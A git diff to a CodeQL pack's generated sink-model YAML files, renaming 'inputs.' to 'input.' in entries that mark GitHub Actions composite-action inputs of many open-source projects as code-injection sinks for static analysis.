b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"] - - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"] - - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"] \ No newline at end of file + - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index 1330f370747..e1ff1fa3497 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"] \ No newline at end of file + - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index d9d9c6770bc..4c5ef712e58 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"] \ No newline at end of file + - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index faf1d7ed5c5..31e1f562877 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"] \ No newline at end of file + - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 12ae92c149b..298ba1ccbe3 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 61001620017..0dc57625890 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index 1d30610cfd1..c6fc16750f8 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 867dc33f432..0cbbd38d428 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file + - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 87b014cbdd6..acc6cb91c07 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index f1b5e6df222..c59e989db04 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -3,23 +3,23 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f952bd1da93..b426dfb250d 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file + - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 977662bfa65..4a0c3c2d30f 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file + - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 4c6c92fdefd..74d0ef69f75 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 45c2c1d780a..ac8762d24ea 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 1edfbfc9432..6df9a160ec5 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file + - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 658283336bd..0c2793028a0 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index d00b30874cc..f5bdc3d4bcc 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 94ece1a58a0..161022b8cbe 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 46d5a4383f4..391b1917029 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 5627a31bd90..3a45707d59e 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] - - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index 98d2d8bcbf7..c2e3608f745 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] - - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file + - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 57fb2e71064..9b8e9d1e7ed 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file + - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 8a216b97e1e..954f2c34661 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file + - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 735413808ec..31cb8acad9e 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file + - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 54334359d0e..4c8df154d8e 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file + - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 67826ea9c0f..8366d5119ae 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end 